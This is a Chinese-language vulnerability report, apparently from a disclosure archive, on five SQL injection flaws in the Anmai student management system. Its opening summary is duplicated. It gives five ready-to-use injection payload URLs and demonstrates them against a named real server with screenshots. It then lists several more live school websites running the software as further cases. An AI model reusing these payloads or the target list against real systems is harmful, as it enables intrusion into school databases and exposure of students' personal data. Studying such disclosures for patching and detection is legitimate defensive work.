VULHUB ™

### 简要描述： 安脉学生综合管理系统5处SQL注入漏洞#3 ### 详细说明： 5处利用payload分别如下 ``` /Asset/Device/Device_Validate.aspx?PrepareNo=1' and @@version=1-- /Asset/Field/fieldInfo_View.aspx?fieldenrolid=1'and @@version=1-- /Asset/House/Add_HouseSort.aspx?radiobutton=1&Action=Edit&HousetypeID=1 and @@version=1 /Asset/House/Admin_Photo.aspx?&Action=Modify&HouseID=1' and @@version=1-- /Asset/House/HouseCancel_view.aspx?HouseID=1' and @@version=1-- ``` ### 漏洞证明： 以http://218.22.96.74:8899 为例进行演示 http://218.22.96.74:8899/Asset/Device/Device_Validate.aspx?PrepareNo=1' and @@version=1-- [<img src="https://images.seebug.org/upload/201504/102228449e66edc7daeaec21c27f2b955431c5de.jpg" alt="QQ截图20150410223337.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/102228449e66edc7daeaec21c27f2b955431c5de.jpg) http://218.22.96.74:8899/Asset/Field/fieldInfo_View.aspx?fieldenrolid=1'and @@version=1-- [<img...

### 简要描述： 安脉学生综合管理系统5处SQL注入漏洞#3 ### 详细说明： 5处利用payload分别如下 ``` /Asset/Device/Device_Validate.aspx?PrepareNo=1' and @@version=1-- /Asset/Field/fieldInfo_View.aspx?fieldenrolid=1'and @@version=1-- /Asset/House/Add_HouseSort.aspx?radiobutton=1&Action=Edit&HousetypeID=1 and @@version=1 /Asset/House/Admin_Photo.aspx?&Action=Modify&HouseID=1' and @@version=1-- /Asset/House/HouseCancel_view.aspx?HouseID=1' and @@version=1-- ``` ### 漏洞证明： 以http://218.22.96.74:8899 为例进行演示 http://218.22.96.74:8899/Asset/Device/Device_Validate.aspx?PrepareNo=1' and @@version=1-- [<img src="https://images.seebug.org/upload/201504/102228449e66edc7daeaec21c27f2b955431c5de.jpg" alt="QQ截图20150410223337.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/102228449e66edc7daeaec21c27f2b955431c5de.jpg) http://218.22.96.74:8899/Asset/Field/fieldInfo_View.aspx?fieldenrolid=1'and @@version=1-- [<img src="https://images.seebug.org/upload/201504/10223015443c7620af0e8294a082e934e3f16c20.jpg" alt="QQ截图20150410223515.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/10223015443c7620af0e8294a082e934e3f16c20.jpg) http://218.22.96.74:8899/Asset/House/Add_HouseSort.aspx?radiobutton=1&Action=Edit&HousetypeID=1 and @@version=1 [<img src="https://images.seebug.org/upload/201504/10223047407ecf61c9c87a369005a4f232ce255f.jpg" alt="QQ截图20150410223546.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/10223047407ecf61c9c87a369005a4f232ce255f.jpg) http://218.22.96.74:8899/Asset/House/Admin_Photo.aspx?&Action=Modify&HouseID=1' and @@version=1-- [<img src="https://images.seebug.org/upload/201504/10223208b45a67b27fb3e309d99f75e04fedc82b.jpg" alt="QQ截图20150410223707.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/10223208b45a67b27fb3e309d99f75e04fedc82b.jpg) http://218.22.96.74:8899/Asset/House/HouseCancel_view.aspx?HouseID=1' and @@version=1-- [<img src="https://images.seebug.org/upload/201504/10223240b598196ecccdbc6e7bd4deb16a52c09a.jpg" alt="QQ截图20150410223740.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/10223240b598196ecccdbc6e7bd4deb16a52c09a.jpg) 再提供些案例 http://www.qs2fz.com:8080/ http://218.4.66.18/ http://bssyxxgl.eicbs.com/anmai/ http://www.gxbyzx.cn:88/ANMAI/ http://jmzx.xmedu.cn:9999/ANMAI/ http://119.52.145.27/anmai/